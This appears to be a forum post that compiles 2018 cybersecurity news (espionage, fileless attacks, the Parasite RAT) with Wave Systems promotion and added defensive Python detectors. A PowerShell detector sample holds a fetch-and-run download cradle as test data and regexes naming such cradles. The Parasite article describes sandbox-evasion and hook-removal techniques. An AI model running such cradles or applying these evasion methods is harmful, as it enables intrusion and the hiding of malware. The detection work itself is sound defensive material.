China Is Still Stealing America’s Business Secrets, U.S. Officials Say
https://www.nextgov.com/cybersecurity/2018/07/china-still-stealing-americas-business-secrets-us-officials-say/150102/
The 2015 agreement between Xi and Obama produced only a lull in Beijing’s economic espionage.
The Chinese theft of U.S. intellectual property remains a “critical” threat, with perpetrators who have adapted to evade the structures of a 3-year-old ban on such hacking, according to a top-secret report intelligence officials sent to Congress this week.
It wasn’t supposed to be this way. In 2015, the U.S. and China signed an agreement to curb Chinese economic espionage over the Internet. That produced a “lull” in Chinese cyber theft, but did not stop it, William Evanina, the director of the National Counterintelligence and Security Center, told reporters Thursday. As the digital ecosystem continues to expand so does the threat posed by Chinese industrial cyber theft to America’s long-term economic power.
Evanina’s office made a shorter, unclassified version of the report available to journalists and to the public. It lists a variety of known cases of recent Chinese economic espionage, as well as other perpetrators of cyber economic espionage. But officials both during their briefing and in their report highlighted China.
“Most Chinese cyber operations against U.S. private industry that have been detected are focused on cleared defense contractors or IT and communications firms whose products and services support government and private sector networks worldwide,” it reads.
One such product, the report says, is CCleaner, a popular consumer application that removes unwanted files from computers. Chinese cyber actors penetrated its production process and pasted malicious code into the application before it shipped, potentially compromising the computers of its 2.3 million customers.
“We are not prepared as a nation to deal with the supply chain threat, holistically,” said Evanina.
“We believe that China will continue to be a threat to U.S. proprietary technology and intellectual property through cyber-enabled means or other methods. If this threat is not addressed, it could erode America’s long-term competitive economic advantage,” says the nonclassified version of the report.
Among the industries in which China and other foreign nations have the most interest are: energy and alternative energy; biotechnology; defense technology; environmental protection; high-end manufacturing; and information and communications technology.
Evanina said the good news is that detection and reporting of cyber espionage has gotten much faster than it was a few years ago.
“Last year represented a watershed in the reporting of software supply chain operations. In 2017, seven significant events were reported in the public domain compared to only four between 2014 and 2016. As the number of events grows, so too are the potential impacts,” notes the report.
Michael Moss, the deputy director of the Cyber Threat Intelligence Integration Center, noted that reporting still isn’t keeping up with rapidly adapting hackers. “They’ll surprise me with how quickly they’ll move… how fast it continues to accelerate.”
The other piece of good news in the officials’ estimates: only a tiny slice of the exploits and vulnerabilities that hackers are using to conduct economic espionage are fancy zero-days that no one has ever seen, the sorts of bugs that you need a gymnasium full of crackerjack military hackers to find. In fact, most are bugs and vulnerabilities that the public, and network managers, should already know about because they’re on the National Vulnerability Database, a massive public list of software bugs maintained by the National Institute of Standards and Technology. Software manufacturers will usually issue patches once a vulnerability in their software shows up on the list. But it’s up to individual IT managers at different companies and enterprises to then make sure that every machine is up to date on all those patches.
“The trend is actually towards use of the less sophisticated, less expensive [publicly known exploits]. That presents some second- and third-order complications, as well,” said Moss. “One of the reasons that a nation state might be inspired to do that, since everybody’s using that tool, it’s harder to prove it was me that did it, right? Whereas if I have written custom code and I’ve used a certain tradecraft, I’ll do it a certain way, right? I’ll start to develop a…signature, right? I can be identified. Folks can say, ‘Hey, that looks like that. That’s usually used by country X, or country Y.’ But if I’m using that exploit tool that I downloaded, well, heck, the high school hackers are using that, too. So how do you know it was me? So the trend actually is towards the more widely-available…tools.”
A case in point, though not related to industrial espionage: the WannaCry attacks that crippled hospitals in 2017. Microsoft issued a patch in March, but slow adoption allowed the worst attacks to occur in June.
It’s one big reason Evanina is reaching out to Congress, and to industry, which owns the treasured and the buggy machines that make it vulnerable.
Patching continues to be “problematic,” he said, urging industry leaders to move toward “an enterprise-level solution.”
https://www.wavesys.com/products/wave-endpoint-monitor
Key Features:
Easy security compliance
• Comports with NIST guidelines for BIOS integrity
Data protection
• Ensures that you can trust the integrity of your measurements for central analysis
• Real-time alerts for zero-day detection of APTs
• Get Windows 8 Malware protection now—WEM covers previous versions of Windows
Simplicity
• Uses standards-based security that’s in every PC you own
• Measurement notifications and reports can be customized for your processes and work flows
• Centralized, remote activation and management of your TPMs
• E-discover which PCs in your organization are enabled for endpoint monitoring
No compromises
• Ensure host integrity—without expensive hardware or excessive administrative overhead
Windows 8 Tablet Compatibility
• Get the same device integrity assurance on Windows 8 Pro & Enterprise tablets that you want for your enterprise PCs - with Wave Mobility Pro - Tablet Edition
https://www.wavesys.com/malware-protection
Excerpt:
Software can’t always detect malware
The big problem with malware is that antivirus software doesn’t always detect it. Anti-malware software is based on signatures of known bad software. However, there always needs to be a patient 0 that discovers he is infected, for the rest of the world to benefit from it. In the case of APTs (Advanced Persistent Threats), your organization may be the only target for the specific strand of malware. In that case, the signature detection process will not protect you. Modern anti-malware and other software packages that promise cyber security or protection from APTs would use various heuristics and "AI" (Artificial Intelligence) to detect malware based on a predefined set of behavioral parameters. A sophisticated attacker is able to fine tune the behavior of the malware he is writing against various known anti-malware software solutions, so that it can evade detection for long periods of time.
A further challenge for anti-malware software is that it commonly works at the OS level. It isn’t very good at seeing deeper into the system, where some malware lives. Malware can hide from anti-malware by feeding it false results as it lies lower in the stack.
Microsoft's got a new plan for managing Windows 10 devices for a monthly fee
If a company has remaining Windows 7, 8 and 8.1 machines in its corporate fleet, sticking with them and Wave products could be a good choice, given the potential added monthly fee mentioned in the article. Also, Windows 10 seems to have been having significant problems with its updates, imo.
https://www.zdnet.com/article/microsofts-got-a-new-plan-for-managing-windows-10-devices-for-a-monthly-fee/
Microsoft is putting together a service aiming to take the pain out of procuring, provisioning and managing Windows 10 devices that it's currently calling the 'Microsoft Managed Desktop.'
Back in 2005, Microsoft conducted a trial via which it managed Windows PCs and servers for Energizer Holdings. The company quietly began selling this managed services offering to enterprises with more than 5,000 seats before ultimately turning the service into Office 365.
It looks like Redmond's about to try an updated variant of this strategy again.
Microsoft is getting closer to revealing its plans for what it's currently calling the "Microsoft Managed Desktop." (Petri.com discovered the name in some recent job postings.)
I'm hearing this Microsoft Managed Desktop is, basically, the Microsoft version of "desktop as a service." It will provide customers the ability to lease a Windows 10 device that's automatically provisioned for them and have the operating system kept up-to-date and more for a single monthly fee, my contacts say.
What differentiates Microsoft's version of desktop-as-a-service from what many companies already offer under that desktop-as-a-service name is the Windows 10 updating component.
As anyone who's been watching Windows 10 feature updates knows, many IT pros are unhappy about Microsoft's twice-yearly feature updates to the OS. They have seen updates break compatibility with things they didn't anticipate. They've seen Microsoft post and pull patches and updates to these releases, making deployment a nightmare. Windows as a service has been a rocky (or substitute your expletive of choice) road for many.
Microsoft looks to be counting on companies being ready for greater predictability -- in terms of spending, updating and support -- in exchange for letting someone else do the driving.
Microsoft already has a number of the pieces in place to make this happen. This past year, Microsoft has been broadening availability of its Windows Autopilot automatic device provisioning service. It's been honing its device financing skills with programs like Surface Plus and Surface Plus for Business, as well as its "Surface as a Service" leasing program. And it currently offers Windows 10, Office 365 and its Intune device-management and security products in the form of the Microsoft 365 subscription bundle.
Microsoft has a team working to put this all together into a new service. One of my contacts said that Bill Karagounis -- former Director of the Windows Insider Program & OS Fundamentals team, who last year joined the Enterprise Mobility and Management part of Windows and Devices -- is in charge of the coming Microsoft Managed Desktop.
What I don't know is how/whether Microsoft plans to allow partners to sell the Microsoft Managed Desktop platform and add value on top of it or if Microsoft intends to sell this directly to large enterprise customers itself (or both). A Microsoft spokesperson said the company had no comment on anything about Microsoft Managed Desktop.
Currently, some Microsoft partners are selling what sounds a lot like this Microsoft Managed Desktop service, but under the "Modern Workplace as a Service (MWaaS)" banner. Microsoft has been using "Modern Workplace" to refer to its Microsoft 365 subscription bundle and related software/services.
CompNow, an Australian education, government and business services vendor, sells a Modern Workplace package that includes a Windows device of choice, Office 365, Windows 10, Enterprise Mobility + Security, managed IT services and helpdesk, a flexible warranty all for one monthly payment, according to the company's website.
Australian services provider CSA also offers a similar bundle of a device, applications and support for a single per user, monthly bill.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/system/files/03-000378.1.02_BR_VSC.pdf
Two-Factor Authentication Usable or Not? A Two-Phase Usability Study of the FIDO U2F Security Key
https://www.blackhat.com/us-18/briefings.html
Why do people choose to use (or not use) Two Factor Authentication (2FA)? We report on some surprising results from a two-phase study on the Yubico Security Key working with Yubico. Despite the Yubico Security Key being among the best in class for usability among hardware tokens, participants in a think-aloud protocol encountered surprising difficulties, with none in the first round able to complete enrollment without guidance. For example, a website demo, built to make adoption simple, instead resulted in profound confusion when participants fell into an infinite loop of inadvertently only playacting the installation. We report on this and other findings of a two phase experiment that analyzed acceptability and usability of the Yubico Security Key, a 2FA hardware token implementing Fast Identity Online (FIDO). We made recommendations, and then tested the new interaction. A repeat of the experiment showed that these recommendations enhanced ease of use but not necessarily acceptability. The second stage identified the remaining primary reasons for rejecting 2FA: fear of losing the device, illusions of personal immunity to risk on the internet, and confidence in personal risk perceptions. Being locked out of an account was something every participant had suffered while losing control of their account was a distant, remote, and heavily discounted risk. The presentation will surprise and inform the practitioners, showing them that usability is not just common sense, in fact, sometimes you need to think sideways to align yourself with your potential users.
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpts:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
Detecting Credential Compromise in AWS
https://www.blackhat.com/us-18/briefings.html
Credential compromise in the cloud is not a threat that one company faces, rather it is a widespread concern as more and more companies operate in the cloud. Credential compromise can lead to many different outcomes depending on the motive of the attacker who compromised the credentials. In some cases in the past, it has led to erroneous AWS service usage for bitcoin mining or other non-destructive yet costly abuse, and in others it has led to companies shutting down due to the loss of data and infrastructure.
This paper describes an approach for detection of compromised credentials in AWS without needing to know all IPs in your infrastructure beforehand.
Presented By
William Bengtson
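The abstract above only states the goal (spotting compromised credentials without a pre-built list of your infrastructure's IPs). The following is an added example written for this page, not the talk's or Netflix's code, of the general "learn, then alert on deviation" idea behind that goal: for each access key, the detector records the source IPs seen during a short learning window and raises an alert the first time that key is used from an address it has never been associated with. The records are constructed to carry the CloudTrail field names a real detector would read (eventTime, eventName, sourceIPAddress, userIdentity.accessKeyId); the key IDs and addresses are made up, and the ten-minute learning window is an assumption chosen for the sample.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample records using CloudTrail field names. Access key IDs
# and addresses are invented; 203.0.113.x is a documentation-only range.
SAMPLE_EVENTS = [
    {"eventTime": "2018-07-20T10:00:00Z", "eventName": "DescribeInstances",
     "sourceIPAddress": "10.0.1.15",
     "userIdentity": {"accessKeyId": "ASIAEXAMPLEKEY00001"}},
    {"eventTime": "2018-07-20T10:05:00Z", "eventName": "ListBuckets",
     "sourceIPAddress": "10.0.1.15",
     "userIdentity": {"accessKeyId": "ASIAEXAMPLEKEY00001"}},
    # CloudTrail records a service DNS name when an AWS service calls on
    # the principal's behalf; it is not a client address.
    {"eventTime": "2018-07-20T10:07:00Z", "eventName": "GetObject",
     "sourceIPAddress": "s3.amazonaws.com",
     "userIdentity": {"accessKeyId": "ASIAEXAMPLEKEY00001"}},
    {"eventTime": "2018-07-20T10:20:00Z", "eventName": "DescribeInstances",
     "sourceIPAddress": "10.0.1.15",
     "userIdentity": {"accessKeyId": "ASIAEXAMPLEKEY00001"}},
    # Same key, hours later, from an address never seen for it before.
    {"eventTime": "2018-07-20T14:00:00Z", "eventName": "GetCallerIdentity",
     "sourceIPAddress": "203.0.113.77",
     "userIdentity": {"accessKeyId": "ASIAEXAMPLEKEY00001"}},
    {"eventTime": "2018-07-20T14:01:00Z", "eventName": "ListUsers",
     "sourceIPAddress": "203.0.113.77",
     "userIdentity": {"accessKeyId": "ASIAEXAMPLEKEY00001"}},
    {"eventTime": "2018-07-20T11:00:00Z", "eventName": "PutObject",
     "sourceIPAddress": "10.0.2.40",
     "userIdentity": {"accessKeyId": "ASIAEXAMPLEKEY00002"}},
]


def parse_time(ts):
    """CloudTrail eventTime is ISO-8601 in UTC with a trailing Z."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


class CredentialIpBaseline:
    """Learns the source IPs each access key is used from, then alerts on new ones."""

    def __init__(self, learn_window=timedelta(minutes=10)):
        self.learn_window = learn_window       # assumption: 10 minutes for the sample
        self.first_seen = {}                   # accessKeyId -> datetime of first use
        self.known_ips = defaultdict(set)      # accessKeyId -> source IPs seen while learning
        self.alerted = set()                   # (accessKeyId, ip) pairs already reported

    def observe(self, event):
        key = event["userIdentity"].get("accessKeyId")
        src = event["sourceIPAddress"]
        when = parse_time(event["eventTime"])
        if key is None or src.endswith(".amazonaws.com"):
            return None                        # no client address to learn or compare
        if key not in self.first_seen:
            self.first_seen[key] = when
        if src in self.known_ips[key]:
            return None
        if when - self.first_seen[key] <= self.learn_window:
            self.known_ips[key].add(src)       # still learning this key's footprint
            return None
        if (key, src) in self.alerted:
            return None                        # report each new (key, ip) pair once
        self.alerted.add((key, src))
        return {"accessKeyId": key, "sourceIPAddress": src,
                "eventName": event["eventName"], "eventTime": event["eventTime"]}


def detect_new_source_ips(events, learn_window=timedelta(minutes=10)):
    """Replay events in time order and return the alerts the baseline produces."""
    baseline = CredentialIpBaseline(learn_window)
    alerts = []
    for ev in sorted(events, key=lambda e: e["eventTime"]):  # Zulu timestamps sort lexically
        alert = baseline.observe(ev)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect_new_source_ips(SAMPLE_EVENTS):
        print("ALERT: key %(accessKeyId)s used from new IP %(sourceIPAddress)s "
              "(%(eventName)s at %(eventTime)s)" % a)
```

Two caveats a practitioner would want stated: the baseline is only trustworthy if it is built before the credential is stolen, which is why a short learning window anchored to the credential's first use suits temporary credentials (the ASIA-prefixed keys that sessions and roles hand out) far better than long-lived keys; and calls relayed by AWS services carry a service DNS name in sourceIPAddress rather than a client IP, so they are excluded from both learning and alerting here.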
Employee credential protection could work through:
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpts:
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
Cyber security experts warn of spike in ‘fileless’ hacking attacks
===Post 245253 and 245255 are interesting and good reading. Thanks Methinks.
https://www.thehindubusinessline.com/info-tech/cyber-security-experts-warn-of-spike-in-fileless-hacking-attacks/article24539407.ece
Cyber security experts have noticed a spike in fileless malware attacks, which take advantage of the trust factor between security software and genuine, signed Windows applications. As they leave no trace in the system, ensuring a zero footprint in the computer system, it is difficult to notice the presence of the malware attack.
“Because this type of attack is launched through reputable, trusted executables, these attacks are hard to detect,” Internet security solutions firm McAfee Labs said.
It says the rapid rise of such attacks is a cause for concern. Unlike in traditional attacks where hackers sneak into systems by launching malware applications, fileless malware attacks do not install any software on a user’s computer.
“This makes a successful attack extremely hard to detect. Both consumers and corporate users can fall victim to this threat. In corporate environments, attackers use this vector to move laterally through the network,” McAfee points out.
Cyber security expert, Debasish Mandal, says CactusTorch is an example of a ‘fileless’ threat. It adopts the DotNetToJScript technique, which loads and executes malicious applications straight from memory. “These assemblies are the smallest unit of deployment of an application, such as a .dll or .exe. The malware does not write any part of the malicious .NET assembly on a computer’s hard drive,” he points out.
This makes traditional file scanners ineffective in detecting these intrusions. “We have seen a rapid growth in the use of CactusTorch this year. This can execute custom shellcode on Windows systems,” he says.
Many fileless malware campaigns have leveraged Microsoft PowerShell to launch attacks in memory, to create a back-door into a system. “What’s interesting is the number of variants discovered,” he says.
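Because the article's point is that in-memory PowerShell leaves nothing for a file scanner to find, the practical detection surface is the command line and script-block text that Windows can log. The example below is added here and is not McAfee's or the article's code: it scores constructed log strings against indicators commonly watched for in PowerShell logging (encoded commands, hidden windows, policy bypass, download cradles, Invoke-Expression, reflective assembly loading) and decodes any -EncodedCommand payload so the indicators inside it are scored too. The weights, the suspicion threshold and the assumption that the log text has already been pulled out as plain strings (for instance from the ScriptBlockText of Event ID 4104) are choices made for this sample.

```python
import base64
import re

# Indicator regexes and weights are assumptions for this example; tune to your telemetry.
INDICATORS = {
    "invoke_expression": (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    "download_cradle": (re.compile(r"downloadstring|downloaddata|net\.webclient|invoke-webrequest", re.I), 2),
    "reflective_load": (re.compile(r"\[(?:system\.)?reflection\.assembly\]::load", re.I), 3),
    "encoded_command": (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I), 1),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "policy_bypass": (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 1),
}
SUSPICION_THRESHOLD = 3
ENCODED_CMD_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_CMD_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(text):
    """Score one logged command line / script block, including any decoded payload."""
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    hits = sorted(name for name, (rx, _) in INDICATORS.items() if rx.search(haystack))
    score = sum(INDICATORS[name][1] for name in hits)
    return {"indicators": hits, "score": score,
            "suspicious": score >= SUSPICION_THRESHOLD, "decoded_payload": decoded}


# Constructed log entries, not captured from any real incident. The encoded
# payload is built at import time so the decoder is exercised on real base64.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
    .encode("utf-16-le")).decode("ascii")
SAMPLE_LOG_LINES = [
    "powershell.exe -NoProfile -Command Get-Service | Where-Object Status -eq Running",
    "powershell.exe -w hidden -ep bypass -enc " + _ENCODED,
    "powershell.exe -Command [System.Reflection.Assembly]::Load($bytes); Start-Sleep 1",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG_LINES:
        r = assess(line)
        print("%-10s score=%d %s" % ("SUSPICIOUS" if r["suspicious"] else "ok",
                                     r["score"], ",".join(r["indicators"]) or "-"))
```

The weighting matters: an encoded command or hidden window alone is common in legitimate automation, while a reflective Load or a download cradle feeding Invoke-Expression is rarely benign, so the third sample trips the threshold on a single indicator and the first trips none. Without decoding, the second sample would show only the launcher switches and miss the cradle entirely, which is the gap this kind of logging is meant to close.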
============================================================
https://www.wavesys.com/products/wave-endpoint-monitor
Detect attacks before it’s too late
Malware can do its work for weeks or months before you ever know it’s there. But with Wave Endpoint Monitor, you can spot malware before it has a chance to cause damage.
Antivirus software can’t detect rootkits and other malware; it works at the level of the OS and isn’t very good at seeing deeper into the system. For example, it can’t tell whether the boot record is lying. The Wave alternative is to work with the Trusted Platform Modules (TPMs), or security chips, embedded in your devices. By using the TPM to attest to the security of the device each time that device boots, Wave looks below the operating system and can help detect threats lurking there. Every time a device boots up, Wave Endpoint Monitor makes a comparison against previous boot values, and if anything deviates from the norm, it alerts you immediately.
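The comparison the excerpt describes rests on how a TPM records a boot: each measured component is hashed and folded into a Platform Configuration Register with the extend operation, new = H(old || H(event)), so the final register value depends on every component and on their order. The example below is added here and is not Wave's code; it replays two constructed boot event logs into PCR values the way a verifier replays a measured-boot log, then diffs the result against a stored known-good set to name the register that changed. The event data strings, the PCR assignments and the choice of SHA-256 (TPM 1.2 parts of that era used SHA-1, which the algorithm parameter covers) are assumptions made for the sample.

```python
import hashlib


def extend(pcr_value, event_data, algo=hashlib.sha256):
    """TPM PCR extend: the register becomes H(old_value || H(event_data))."""
    digest = algo(event_data).digest()
    return algo(pcr_value + digest).digest()


def replay_event_log(events, algo=hashlib.sha256):
    """Replay (pcr_index, event_data) pairs into final PCR values, starting from zeroed PCRs."""
    zero = b"\x00" * algo().digest_size
    pcrs = {}
    for pcr_index, data in events:
        pcrs[pcr_index] = extend(pcrs.get(pcr_index, zero), data, algo)
    return pcrs


def compare_to_baseline(baseline_pcrs, current_pcrs):
    """Sorted PCR indices whose value differs from the stored baseline (or is missing)."""
    indices = set(baseline_pcrs) | set(current_pcrs)
    return sorted(i for i in indices if baseline_pcrs.get(i) != current_pcrs.get(i))


def attest_boot(baseline_log, current_log, algo=hashlib.sha256):
    deviated = compare_to_baseline(replay_event_log(baseline_log, algo),
                                   replay_event_log(current_log, algo))
    return {"clean": not deviated, "deviated_pcrs": deviated}


def order_is_significant():
    """Same events in a different order yield a different PCR: extend is not a set hash."""
    a = replay_event_log([(0, b"first"), (0, b"second")])[0]
    b = replay_event_log([(0, b"second"), (0, b"first")])[0]
    return a != b


# Constructed boot logs (PCR index, measured data). Real logs carry digests of
# firmware volumes, option ROMs, the boot manager and Secure Boot variables;
# the PCR assignments below follow the conventional split but are illustrative.
KNOWN_GOOD_BOOT = [
    (0, b"firmware-volume-v1.2.3"),
    (0, b"embedded-option-rom-nic"),
    (2, b"option-rom-gpu"),
    (4, b"bootmgr.efi build 10240"),
    (7, b"SecureBoot=1"),
]
TAMPERED_BOOT = [
    (0, b"firmware-volume-v1.2.3"),
    (0, b"embedded-option-rom-nic"),
    (2, b"option-rom-gpu"),
    (4, b"bootkit-modified-bootmgr.efi"),   # boot manager swapped out below the OS
    (7, b"SecureBoot=1"),
]

if __name__ == "__main__":
    print(attest_boot(KNOWN_GOOD_BOOT, KNOWN_GOOD_BOOT))   # clean
    print(attest_boot(KNOWN_GOOD_BOOT, TAMPERED_BOOT))     # PCR 4 deviates
```

The part this sample leaves out is what makes the scheme resist a lying boot record: in a real deployment the verifier does not trust PCR values reported by software, it asks the TPM for a quote, a signature by a TPM-resident attestation key over the PCR values and a fresh nonce, and checks that signature before running the comparison above. A deviation in PCR 4 alone, as here, points at the boot manager rather than firmware, which is the kind of localisation that lets a responder act before the OS-level tools the excerpt distrusts have even started.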
Russian Hack Into US Power Grid Began With Stolen Passwords
Wave Systems' products could someday save the World.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.nbcwashington.com/news/national-international/Russian-Hackers-US-Power-Grid-489228711.html
Russian hackers who penetrated hundreds of U.S. utilities, manufacturing plants and other facilities last year gained access by using the most conventional of phishing tools, tricking staffers into entering passwords, officials say.
The Russians targeted mostly the energy sector but also nuclear, aviation and critical manufacturing, Jonathan Homer, head of Homeland Security's industrial control system analysis, said during a briefing Wednesday.
They had the capability to cause mass blackouts, but chose not to, and there was no threat the grid would go down, the officials said. Instead, the hackers appeared more focused on reconnaissance.
The 2017 attack prompted a rebuke from the Trump administration earlier this year.
The victims ranged from smaller companies with no major budget for cybersecurity to large corporations with sophisticated security networks, Homer said. Vendors were targeted because of their direct access to the utilities — companies that run diagnostics or update software or perform other tasks to keep the systems running. The victims were not identified.
"This is a situation where they went in and said this is what they're looking for, and found weaknesses there," Homer said.
The newly disclosed details of the 2017 hack come amid growing concerns over Russia's efforts to interfere in the November midterm elections and the recent indictments of a dozen Russian military intelligence officers accused of infiltrating the Clinton presidential campaign and the Democratic Party and releasing tens of thousands of private communications.
U.S. national security officials previously said they had determined that Russian intelligence and others were behind the cyberattacks. They said the hackers chose their targets methodically, obtained access to computer systems, conducted "network reconnaissance" and then attempted to cover their tracks by deleting evidence of the intrusions. The U.S. government said it had helped the industries expel the Russians from all systems known to have been penetrated.
It wasn't clear if more had been compromised since news of the attack was made public earlier this year. Wednesday's briefing was intended to help businesses defend themselves from future attacks.
Homer said the attack began in 2016 with a single breach that stayed dormant nearly a year before other infiltrations occurred in concentric circles closer and closer to the U.S. systems.
Hackers used a mix of real people downloading open-source information from company websites like photos and other data, and attacks that trick employees into entering passwords on spoofed websites. Hackers then use the passwords to compromise corporate networks. It's possible some of the companies are unaware they were compromised, because hackers used credentials of actual employees to get inside, which could make it harder to detect, officials said.
Highly Sophisticated Parasite RAT Emerges on the Dark Web
It seems like Wave Endpoint Monitor with its credentials could be one of only a few anti-malware programs that could stop this malware. Or rather there are many anti-malware programs that would allow this malware to take over a computer. imo.
https://threatpost.com/highly-sophisticated-parasite-rat-emerges-on-the-dark-web/134478/
This brand-new RAT represents the latest escalation in an ongoing malware arms race that extends even to commodity malware.
Researchers are tracking a remote access trojan (RAT) on underground markets that, so far, has only been attributed to one small malicious email campaign. However, the RAT, dubbed Parasite HTTP by the Proofpoint researchers that discovered it, has an impressive list of sophisticated features – raising concerns over future attacks.
The ad for the malware on the Dark Web reads, “Parasite HTTP is a professionally coded modular remote administration tool for windows written in C that has no dependencies except the OS itself. With the stub size of ~49KB and plugin support it presents perfect solution for controlling large amount of computers from a remote location.”
Like most RATs, Parasite HTTP offers extensive information-stealing capabilities, VNC for unobtrusively observing or controlling a PC and user management for bypassing permissions. It also advertises capabilities such as firewall bypass, optional system-wide persistence and injection to white-listed system processes. And, like legitimate software, Parasite HTTP includes administrator perks, like backups, analysis views and activity statistics, a secure log-in page with CAPTCHA, an advanced task management system and password recovery. It also features encryption for its C2 communications.
Where it really shines though is with an array of sandbox detection, anti-debugging, anti-emulation and other protections for evading detection and analysis.
“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates,” Proofpoint researchers said in a posting on Wednesday. “Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems.”
The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post-infection.
Sherrod DeGrippo, director of emerging threats for Proofpoint, told Threatpost that having so many techniques aggregated in a single piece of commodity malware marks a new chapter in bad code.
“We frequently see one or more of these techniques appear in a variety of malware, but for all of them to appear in a single piece of malware, readily available for sale on underground forums, is unusual,” he explained.
The spam campaign that served as the RAT’s coming-out party was fairly straightforward, according to Proofpoint. It targeted the IT, healthcare and retail industries, using HR distribution lists and Word document attachments purporting to be resumes and CVs. Once opened, the documents used weaponized macros to fetch Parasite HTTP from a remote site.
While the attack vector is familiar, Parasite HTTP should put the security community on notice, researchers said.
“For consumers, organizations and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware like Parasite,” they wrote. “While we have currently only observed Parasite HTTP in a small campaign, we expect to see features like those used in Parasite continue to propagate across other malware variants.”
DeGrippo told us, “A fairly robust RAT that is difficult to detect, utilizes sophisticated anti-analysis features, and is also readily available for purchase means that both defenders and organizations need to implement dynamic detection capabilities that incorporate deep threat intelligence to stay ahead of the curve.”
State-of-the-Art Evasion Techniques
The researchers detailed several of Parasite HTTP’s most interesting evasion attributes, including obfuscated strings, sandbox evasion via sleep manipulation, the use of researcher code from Github for sandbox detection and others.
When it comes to obfuscated strings of code, Parasite HTTP contains four routines, preceded by a 6-byte header.
“For each type of string, ASCII or Unicode, one variant leaves the obfuscated string in place and returns a dynamically-allocated, deobfuscated version of the string,” researchers said. “The other variant uses VirtualProtect to deobfuscate the string in place, setting the XOR key to 0 after the deobfuscation has been performed, which effectively skips deobfuscation during future access to the string.”
Parasite HTTP also uses a sleep routine to delay execution and check for sandboxes or emulation. It sleeps in 10-millisecond intervals, while detecting sandbox environments by checking for the passage of time and non-interference with its own handling of breakpoint instructions.
“The sandbox-checking routine…checks whether between 900 milliseconds and two seconds elapsed in response to the routine’s one-second sleep, split into 10ms increments,” researchers explained. “Sandboxes using code like that available in [Github] for example, would have run afoul of this particular sandbox check.”
Parasite HTTP adapts code from Github for its own sandbox detection purposes. The code is copied verbatim, with the API resolution replaced with its own internal code, the prints removed, and the file and environment variable names generated randomly, the analysts said. Meanwhile, when Parasite HTTP actually does detect a sandbox, it doesn’t make any sudden moves that might tip off researchers.
“It does not simply exit or throw an error, instead making it difficult for researchers to determine why the malware did not run properly and crashed,” researchers said. “Parasite HTTP uses its sandbox detection in a clever way to result in a later crash, on attempting to use a buffer whose allocation was skipped.”
Meanwhile, Parasite HTTP resolves certain critical APIs by using a DLL remapping technique to hide behaviors like process injection.
“While previously documented, [the technique] has not, to our knowledge, been used recently in other major malware families,” according to Proofpoint.
In its initial process, Parasite HTTP removes hooks on the aforementioned DLLs by reading them in from disk and comparing the first five bytes of each exported function to that present in the currently mapped version in memory. This allows its activities to be quiet.
“Though this technique is naive in its implementation, not making use of any instruction decoder and limiting itself to five hardcoded bytes, it is effective in practice,” the researchers noted. “Mapping the new copy of NTDLL effectively provides it with a copy free of any hooks placed on the initial NTDLL mapping, rendering its thread injection and registry modifications invisible to most users and hooking implementations. Further, since this mapping is accomplished with NtOpenSection and NtMapViewOfSection, it will not involve the typical calls to filesystem APIs used by other variants of the technique to achieve the same goal.”
And finally, it features obfuscated checking for breakpoints within critical functions, using additional code from GitHub.
“This functionality is only used in one location to check a single function in the malware that calls out to the sandbox detection,” researchers said. They added that on this front, the RAT isn’t fully baked.
“It is worth noting that this technique is naive and unreliable long-term over arbitrary code, as unintentional 0xcc bytes can be found in a simple byte-by-byte scan of code through certain instruction encodings, local stack frame offsets, relative references, indirect addresses or immediate constants,” they said.
https://www.wavesys.com/malware-protection
Wave’s solution: start with the device
